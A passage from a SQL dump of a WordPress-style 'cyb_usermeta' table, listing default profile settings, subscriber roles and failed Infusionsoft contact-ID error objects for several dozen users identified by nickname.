(25687, 1967, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25688, 1967, 'cyb_user_level', '0'),
(25689, 1967, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25690, 1967, 'default_password_nag', '1'),
(25691, 1968, 'nickname', 'jakob_reich1980'),
(25692, 1968, 'first_name', ''),
(25693, 1968, 'last_name', ''),
(25694, 1968, 'description', ''),
(25695, 1968, 'rich_editing', 'true'),
(25696, 1968, 'comment_shortcuts', 'false'),
(25697, 1968, 'admin_color', 'fresh'),
(25698, 1968, 'use_ssl', '0'),
(25699, 1968, 'show_admin_bar_front', 'true'),
(25700, 1968, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25701, 1968, 'cyb_user_level', '0'),
(25702, 1968, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25703, 1968, 'default_password_nag', '1'),
(25704, 1969, 'nickname', 'a_weagraff1989'),
(25705, 1969, 'first_name', ''),
(25706, 1969, 'last_name', ''),
(25707, 1969, 'description', ''),
(25708, 1969, 'rich_editing', 'true'),
(25709, 1969, 'comment_shortcuts', 'false'),
(25710, 1969, 'admin_color', 'fresh'),
(25711, 1969, 'use_ssl', '0'),
(25712, 1969, 'show_admin_bar_front', 'true'),
(25713, 1969, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25714, 1969, 'cyb_user_level', '0'),
(25715, 1969, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25716, 1969, 'default_password_nag', '1'),
(25717, 1970, 'nickname', 'jbarak71961'),
(25718, 1970, 'first_name', ''),
(25719, 1970, 'last_name', ''),
(25720, 1970, 'description', ''),
(25721, 1970, 'rich_editing', 'true'),
(25722, 1970, 'comment_shortcuts', 'false'),
(25723, 1970, 'admin_color', 'fresh'),
(25724, 1970, 'use_ssl', '0'),
(25725, 1970, 'show_admin_bar_front', 'true'),
(25726, 1970, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25727, 1970, 'cyb_user_level', '0'),
(25728, 1970, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25729, 1970, 'default_password_nag', '1'),
(25730, 1971, 'nickname', 'starboitx1965'),
(25731, 1971, 'first_name', ''),
(25732, 1971, 'last_name', ''),
(25733, 1971, 'description', ''),
(25734, 1971, 'rich_editing', 'true'),
(25735, 1971, 'comment_shortcuts', 'false'),
(25736, 1971, 'admin_color', 'fresh'),
(25737, 1971, 'use_ssl', '0'),
(25738, 1971, 'show_admin_bar_front', 'true'),
(25739, 1971, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25740, 1971, 'cyb_user_level', '0'),
(25741, 1971, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25742, 1971, 'default_password_nag', '1'),
(25743, 1972, 'nickname', 'seabeechick89801996'),
(25744, 1972, 'first_name', ''),
(25745, 1972, 'last_name', ''),
(25746, 1972, 'description', ''),
(25747, 1972, 'rich_editing', 'true'),
(25748, 1972, 'comment_shortcuts', 'false'),
(25749, 1972, 'admin_color', 'fresh'),
(25750, 1972, 'use_ssl', '0'),
(25751, 1972, 'show_admin_bar_front', 'true'),
(25752, 1972, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25753, 1972, 'cyb_user_level', '0'),
(25754, 1972, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25755, 1972, 'default_password_nag', '1'),
(25756, 1973, 'nickname', 'ashleyposkin1978'),
(25757, 1973, 'first_name', ''),
(25758, 1973, 'last_name', ''),
(25759, 1973, 'description', ''),
(25760, 1973, 'rich_editing', 'true'),
(25761, 1973, 'comment_shortcuts', 'false'),
(25762, 1973, 'admin_color', 'fresh'),
(25763, 1973, 'use_ssl', '0'),
(25764, 1973, 'show_admin_bar_front', 'true'),
(25765, 1973, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25766, 1973, 'cyb_user_level', '0'),
(25767, 1973, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25768, 1973, 'default_password_nag', '1'),
(25769, 1974, 'nickname', 'swander11994'),
(25770, 1974, 'first_name', ''),
(25771, 1974, 'last_name', ''),
(25772, 1974, 'description', ''),
(25773, 1974, 'rich_editing', 'true'),
(25774, 1974, 'comment_shortcuts', 'false'),
(25775, 1974, 'admin_color', 'fresh'),
(25776, 1974, 'use_ssl', '0'),
(25777, 1974, 'show_admin_bar_front', 'true'),
(25778, 1974, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25779, 1974, 'cyb_user_level', '0'),
(25780, 1974, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25781, 1974, 'default_password_nag', '1'),
(25782, 1975, 'nickname', 'philipvsharp2004'),
(25783, 1975, 'first_name', ''),
(25784, 1975, 'last_name', ''),
(25785, 1975, 'description', ''),
(25786, 1975, 'rich_editing', 'true'),
(25787, 1975, 'comment_shortcuts', 'false'),
(25788, 1975, 'admin_color', 'fresh'),
(25789, 1975, 'use_ssl', '0'),
(25790, 1975, 'show_admin_bar_front', 'true'),
(25791, 1975, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25792, 1975, 'cyb_user_level', '0'),
(25793, 1975, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25794, 1975, 'default_password_nag', '1'),
(25795, 1976, 'nickname', 'asantana682006'),
(25796, 1976, 'first_name', ''),
(25797, 1976, 'last_name', ''),
(25798, 1976, 'description', ''),
(25799, 1976, 'rich_editing', 'true'),
(25800, 1976, 'comment_shortcuts', 'false'),
(25801, 1976, 'admin_color', 'fresh'),
(25802, 1976, 'use_ssl', '0'),
(25803, 1976, 'show_admin_bar_front', 'true'),
(25804, 1976, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25805, 1976, 'cyb_user_level', '0'),
(25806, 1976, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25807, 1976, 'default_password_nag', '1'),
(25808, 1977, 'nickname', 'mdizzia1987'),
(25809, 1977, 'first_name', ''),
(25810, 1977, 'last_name', ''),
(25811, 1977, 'description', ''),
(25812, 1977, 'rich_editing', 'true'),
(25813, 1977, 'comment_shortcuts', 'false'),
(25814, 1977, 'admin_color', 'fresh'),
(25815, 1977, 'use_ssl', '0'),
(25816, 1977, 'show_admin_bar_front', 'true'),
(25817, 1977, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25818, 1977, 'cyb_user_level', '0'),
(25819, 1977, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25820, 1977, 'default_password_nag', '1'),
(25821, 1978, 'nickname', 'marisbdavis2003'),
(25822, 1978, 'first_name', ''),
(25823, 1978, 'last_name', ''),
(25824, 1978, 'description', ''),
(25825, 1978, 'rich_editing', 'true'),
(25826, 1978, 'comment_shortcuts', 'false'),
(25827, 1978, 'admin_color', 'fresh'),
(25828, 1978, 'use_ssl', '0'),
(25829, 1978, 'show_admin_bar_front', 'true'),
(25830, 1978, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25831, 1978, 'cyb_user_level', '0'),
(25832, 1978, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25833, 1978, 'default_password_nag', '1'),
(25834, 1979, 'nickname', 'deltufotorre1966'),
(25835, 1979, 'first_name', ''),
(25836, 1979, 'last_name', ''),
(25837, 1979, 'description', ''),
(25838, 1979, 'rich_editing', 'true'),
(25839, 1979, 'comment_shortcuts', 'false'),
(25840, 1979, 'admin_color', 'fresh'),
(25841, 1979, 'use_ssl', '0'),
(25842, 1979, 'show_admin_bar_front', 'true'),
(25843, 1979, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25844, 1979, 'cyb_user_level', '0'),
(25845, 1979, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25846, 1979, 'default_password_nag', '1'),
(25847, 1980, 'nickname', 'od1209851987'),
(25848, 1980, 'first_name', ''),
(25849, 1980, 'last_name', ''),
(25850, 1980, 'description', ''),
(25851, 1980, 'rich_editing', 'true'),
(25852, 1980, 'comment_shortcuts', 'false'),
(25853, 1980, 'admin_color', 'fresh'),
(25854, 1980, 'use_ssl', '0'),
(25855, 1980, 'show_admin_bar_front', 'true'),
(25856, 1980, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25857, 1980, 'cyb_user_level', '0'),
(25858, 1980, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25859, 1980, 'default_password_nag', '1'),
(25860, 1981, 'nickname', 'nortonmr771980'),
(25861, 1981, 'first_name', ''),
(25862, 1981, 'last_name', ''),
(25863, 1981, 'description', ''),
(25864, 1981, 'rich_editing', 'true'),
(25865, 1981, 'comment_shortcuts', 'false'),
(25866, 1981, 'admin_color', 'fresh'),
(25867, 1981, 'use_ssl', '0'),
(25868, 1981, 'show_admin_bar_front', 'true'),
(25869, 1981, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25870, 1981, 'cyb_user_level', '0'),
(25871, 1981, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25872, 1981, 'default_password_nag', '1'),
(25873, 1982, 'nickname', 'milordteno1984'),
(25874, 1982, 'first_name', ''),
(25875, 1982, 'last_name', ''),
(25876, 1982, 'description', ''),
(25877, 1982, 'rich_editing', 'true'),
(25878, 1982, 'comment_shortcuts', 'false'),
(25879, 1982, 'admin_color', 'fresh'),
(25880, 1982, 'use_ssl', '0'),
(25881, 1982, 'show_admin_bar_front', 'true'),
(25882, 1982, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25883, 1982, 'cyb_user_level', '0'),
(25884, 1982, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25885, 1982, 'default_password_nag', '1'),
(25886, 1983, 'nickname', 'ashlane31983'),
(25887, 1983, 'first_name', ''),
(25888, 1983, 'last_name', ''),
(25889, 1983, 'description', ''),
(25890, 1983, 'rich_editing', 'true'),
(25891, 1983, 'comment_shortcuts', 'false'),
(25892, 1983, 'admin_color', 'fresh'),
(25893, 1983, 'use_ssl', '0'),
(25894, 1983, 'show_admin_bar_front', 'true'),
(25895, 1983, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25896, 1983, 'cyb_user_level', '0'),
(25897, 1983, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25898, 1983, 'default_password_nag', '1'),
(25899, 1984, 'nickname', 'kenetyw1953'),
(25900, 1984, 'first_name', ''),
(25901, 1984, 'last_name', ''),
(25902, 1984, 'description', ''),
(25903, 1984, 'rich_editing', 'true'),
(25904, 1984, 'comment_shortcuts', 'false'),
(25905, 1984, 'admin_color', 'fresh'),
(25906, 1984, 'use_ssl', '0'),
(25907, 1984, 'show_admin_bar_front', 'true'),
(25908, 1984, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25909, 1984, 'cyb_user_level', '0'),
(25910, 1984, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25911, 1984, 'default_password_nag', '1'),
(25912, 1985, 'nickname', 'bobjessberger1954'),
(25913, 1985, 'first_name', ''),
(25914, 1985, 'last_name', ''),
(25915, 1985, 'description', ''),
(25916, 1985, 'rich_editing', 'true'),
(25917, 1985, 'comment_shortcuts', 'false'),
(25918, 1985, 'admin_color', 'fresh'),
(25919, 1985, 'use_ssl', '0'),
(25920, 1985, 'show_admin_bar_front', 'true'),
(25921, 1985, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25922, 1985, 'cyb_user_level', '0'),
(25923, 1985, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25924, 1985, 'default_password_nag', '1'),
(25925, 1986, 'nickname', 'tsaustin1961'),
(25926, 1986, 'first_name', ''),
(25927, 1986, 'last_name', ''),
(25928, 1986, 'description', ''),
(25929, 1986, 'rich_editing', 'true'),
(25930, 1986, 'comment_shortcuts', 'false'),
(25931, 1986, 'admin_color', 'fresh'),
(25932, 1986, 'use_ssl', '0'),
(25933, 1986, 'show_admin_bar_front', 'true'),
(25934, 1986, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25935, 1986, 'cyb_user_level', '0'),
(25936, 1986, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25937, 1986, 'default_password_nag', '1'),
(25938, 1987, 'nickname', 'irnman2111994'),
(25939, 1987, 'first_name', ''),
(25940, 1987, 'last_name', ''),
(25941, 1987, 'description', ''),
(25942, 1987, 'rich_editing', 'true'),
(25943, 1987, 'comment_shortcuts', 'false'),
(25944, 1987, 'admin_color', 'fresh'),
(25945, 1987, 'use_ssl', '0'),
(25946, 1987, 'show_admin_bar_front', 'true'),
(25947, 1987, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25948, 1987, 'cyb_user_level', '0'),
(25949, 1987, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25950, 1987, 'default_password_nag', '1'),
(25951, 1988, 'nickname', 'b_ford631957'),
(25952, 1988, 'first_name', ''),
(25953, 1988, 'last_name', ''),
(25954, 1988, 'description', ''),
(25955, 1988, 'rich_editing', 'true'),
(25956, 1988, 'comment_shortcuts', 'false'),
(25957, 1988, 'admin_color', 'fresh'),
(25958, 1988, 'use_ssl', '0'),
(25959, 1988, 'show_admin_bar_front', 'true'),
(25960, 1988, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25961, 1988, 'cyb_user_level', '0'),
(25962, 1988, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25963, 1988, 'default_password_nag', '1'),
(25964, 1989, 'nickname', 'stephaport1956'),
(25965, 1989, 'first_name', ''),
(25966, 1989, 'last_name', ''),
(25967, 1989, 'description', ''),
(25968, 1989, 'rich_editing', 'true'),
(25969, 1989, 'comment_shortcuts', 'false'),
(25970, 1989, 'admin_color', 'fresh'),
(25971, 1989, 'use_ssl', '0'),
(25972, 1989, 'show_admin_bar_front', 'true'),
(25973, 1989, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25974, 1989, 'cyb_user_level', '0'),
(25975, 1989, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25976, 1989, 'default_password_nag', '1'),
(25977, 1990, 'nickname', 'apalumbo861992'),
(25978, 1990, 'first_name', ''),
(25979, 1990, 'last_name', ''),
(25980, 1990, 'description', ''),
(25981, 1990, 'rich_editing', 'true'),
(25982, 1990, 'comment_shortcuts', 'false'),
(25983, 1990, 'admin_color', 'fresh'),
(25984, 1990, 'use_ssl', '0'),
(25985, 1990, 'show_admin_bar_front', 'true'),
(25986, 1990, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25987, 1990, 'cyb_user_level', '0'),
(25988, 1990, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25989, 1990, 'default_password_nag', '1'),
(25990, 1991, 'nickname', 'lynne39secret1964'),
(25991, 1991, 'first_name', ''),
(25992, 1991, 'last_name', ''),
(25993, 1991, 'description', ''),
(25994, 1991, 'rich_editing', 'true'),
(25995, 1991, 'comment_shortcuts', 'false'),
(25996, 1991, 'admin_color', 'fresh'),
(25997, 1991, 'use_ssl', '0'),
(25998, 1991, 'show_admin_bar_front', 'true'),
(25999, 1991, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26000, 1991, 'cyb_user_level', '0'),
(26001, 1991, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26002, 1991, 'default_password_nag', '1'),
(26003, 1992, 'nickname', 'greg333332005'),
(26004, 1992, 'first_name', ''),
(26005, 1992, 'last_name', ''),
(26006, 1992, 'description', ''),
(26007, 1992, 'rich_editing', 'true'),
(26008, 1992, 'comment_shortcuts', 'false'),
(26009, 1992, 'admin_color', 'fresh'),
(26010, 1992, 'use_ssl', '0'),
(26011, 1992, 'show_admin_bar_front', 'true'),
(26012, 1992, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26013, 1992, 'cyb_user_level', '0'),
(26014, 1992, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26015, 1992, 'default_password_nag', '1'),
(26016, 1993, 'nickname', 'lmada1951'),
(26017, 1993, 'first_name', ''),
(26018, 1993, 'last_name', ''),
(26019, 1993, 'description', ''),
(26020, 1993, 'rich_editing', 'true'),
(26021, 1993, 'comment_shortcuts', 'false'),
(26022, 1993, 'admin_color', 'fresh'),
(26023, 1993, 'use_ssl', '0'),
(26024, 1993, 'show_admin_bar_front', 'true'),
(26025, 1993, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26026, 1993, 'cyb_user_level', '0'),
(26027, 1993, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26028, 1993, 'default_password_nag', '1'),
(26029, 1994, 'nickname', 'andrew227501998'),
(26030, 1994, 'first_name', ''),
(26031, 1994, 'last_name', ''),
(26032, 1994, 'description', ''),
(26033, 1994, 'rich_editing', 'true'),
(26034, 1994, 'comment_shortcuts', 'false'),
(26035, 1994, 'admin_color', 'fresh'),
(26036, 1994, 'use_ssl', '0'),
(26037, 1994, 'show_admin_bar_front', 'true'),
(26038, 1994, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26039, 1994, 'cyb_user_level', '0'),
(26040, 1994, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26041, 1994, 'default_password_nag', '1'),
(26042, 1995, 'nickname', 'force7732000'),
(26043, 1995, 'first_name', ''),
(26044, 1995, 'last_name', ''),
(26045, 1995, 'description', ''),
(26046, 1995, 'rich_editing', 'true'),
(26047, 1995, 'comment_shortcuts', 'false'),
(26048, 1995, 'admin_color', 'fresh'),
(26049, 1995, 'use_ssl', '0'),
(26050, 1995, 'show_admin_bar_front', 'true'),
(26051, 1995, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26052, 1995, 'cyb_user_level', '0'),
(26053, 1995, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26054, 1995, 'default_password_nag', '1'),
(26055, 1996, 'nickname', 'ericgr061993'),
(26056, 1996, 'first_name', ''),
(26057, 1996, 'last_name', ''),
(26058, 1996, 'description', ''),
(26059, 1996, 'rich_editing', 'true'),
(26060, 1996, 'comment_shortcuts', 'false'),
(26061, 1996, 'admin_color', 'fresh'),
(26062, 1996, 'use_ssl', '0'),
(26063, 1996, 'show_admin_bar_front', 'true'),
(26064, 1996, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26065, 1996, 'cyb_user_level', '0'),
(26066, 1996, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26067, 1996, 'default_password_nag', '1'),
(26068, 1997, 'nickname', 'lorihansen2010'),
(26069, 1997, 'first_name', ''),
(26070, 1997, 'last_name', ''),
(26071, 1997, 'description', ''),
(26072, 1997, 'rich_editing', 'true'),
(26073, 1997, 'comment_shortcuts', 'false'),
(26074, 1997, 'admin_color', 'fresh'),
(26075, 1997, 'use_ssl', '0'),
(26076, 1997, 'show_admin_bar_front', 'true'),
(26077, 1997, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26078, 1997, 'cyb_user_level', '0'),
(26079, 1997, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26080, 1997, 'default_password_nag', '1'),
(26081, 1998, 'nickname', 'liz.joiner1957'),
(26082, 1998, 'first_name', ''),
(26083, 1998, 'last_name', ''),
(26084, 1998, 'description', ''),
(26085, 1998, 'rich_editing', 'true'),
(26086, 1998, 'comment_shortcuts', 'false'),
(26087, 1998, 'admin_color', 'fresh'),
(26088, 1998, 'use_ssl', '0'),
(26089, 1998, 'show_admin_bar_front', 'true'),
(26090, 1998, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26091, 1998, 'cyb_user_level', '0'),
(26092, 1998, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26093, 1998, 'default_password_nag', '1'),
(26094, 1999, 'nickname', 'tmo09911961'),
(26095, 1999, 'first_name', ''),
(26096, 1999, 'last_name', ''),
(26097, 1999, 'description', ''),
(26098, 1999, 'rich_editing', 'true'),
(26099, 1999, 'comment_shortcuts', 'false'),
(26100, 1999, 'admin_color', 'fresh'),
(26101, 1999, 'use_ssl', '0'),
(26102, 1999, 'show_admin_bar_front', 'true'),
(26103, 1999, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26104, 1999, 'cyb_user_level', '0'),
(26105, 1999, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26106, 1999, 'default_password_nag', '1'),
(26107, 2000, 'nickname', 'vic99831995'),
(26108, 2000, 'first_name', ''),
(26109, 2000, 'last_name', ''),
(26110, 2000, 'description', ''),
(26111, 2000, 'rich_editing', 'true'),
(26112, 2000, 'comment_shortcuts', 'false'),
(26113, 2000, 'admin_color', 'fresh'),
(26114, 2000, 'use_ssl', '0'),
(26115, 2000, 'show_admin_bar_front', 'true'),
(26116, 2000, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26117, 2000, 'cyb_user_level', '0');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(26118, 2000, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26119, 2000, 'default_password_nag', '1'),
(26120, 2001, 'nickname', 'brissle12341974'),
(26121, 2001, 'first_name', ''),
(26122, 2001, 'last_name', ''),
(26123, 2001, 'description', ''),
(26124, 2001, 'rich_editing', 'true'),
(26125, 2001, 'comment_shortcuts', 'false'),
(26126, 2001, 'admin_color', 'fresh'),
(26127, 2001, 'use_ssl', '0'),
(26128, 2001, 'show_admin_bar_front', 'true'),
(26129, 2001, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26130, 2001, 'cyb_user_level', '0'),
(26131, 2001, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26132, 2001, 'default_password_nag', '1'),
(26133, 2002, 'nickname', 'briannabbrooks1992'),
(26134, 2002, 'first_name', ''),
(26135, 2002, 'last_name', ''),
(26136, 2002, 'description', ''),
(26137, 2002, 'rich_editing', 'true'),
(26138, 2002, 'comment_shortcuts', 'false'),
(26139, 2002, 'admin_color', 'fresh'),
(26140, 2002, 'use_ssl', '0'),
(26141, 2002, 'show_admin_bar_front', 'true'),
(26142, 2002, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26143, 2002, 'cyb_user_level', '0'),
(26144, 2002, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26145, 2002, 'default_password_nag', '1'),
(26146, 2003, 'nickname', 'ae1snyder1951'),
(26147, 2003, 'first_name', ''),
(26148, 2003, 'last_name', ''),
(26149, 2003, 'description', ''),
(26150, 2003, 'rich_editing', 'true'),
(26151, 2003, 'comment_shortcuts', 'false'),
(26152, 2003, 'admin_color', 'fresh'),
(26153, 2003, 'use_ssl', '0'),
(26154, 2003, 'show_admin_bar_front', 'true'),
(26155, 2003, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26156, 2003, 'cyb_user_level', '0'),
(26157, 2003, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26158, 2003, 'default_password_nag', '1'),
(26159, 2004, 'nickname', 'jerrywang17891993'),
(26160, 2004, 'first_name', ''),
(26161, 2004, 'last_name', ''),
(26162, 2004, 'description', ''),
(26163, 2004, 'rich_editing', 'true'),
(26164, 2004, 'comment_shortcuts', 'false'),
(26165, 2004, 'admin_color', 'fresh'),
(26166, 2004, 'use_ssl', '0'),
(26167, 2004, 'show_admin_bar_front', 'true'),
(26168, 2004, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(26169, 2004, 'cyb_user_level', '0'),
(26170, 2004, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(26171, 2004, 'default_password_nag', '1'),
(26172, 2005, 'nickname', 'angelight2008'),
(26173, 2005, 'first_name', ''),
(26174, 2005, 'last_name', ''),
(26175, 2005, 'description', ''),
(26176, 2005, 'rich_editing', 'true'),
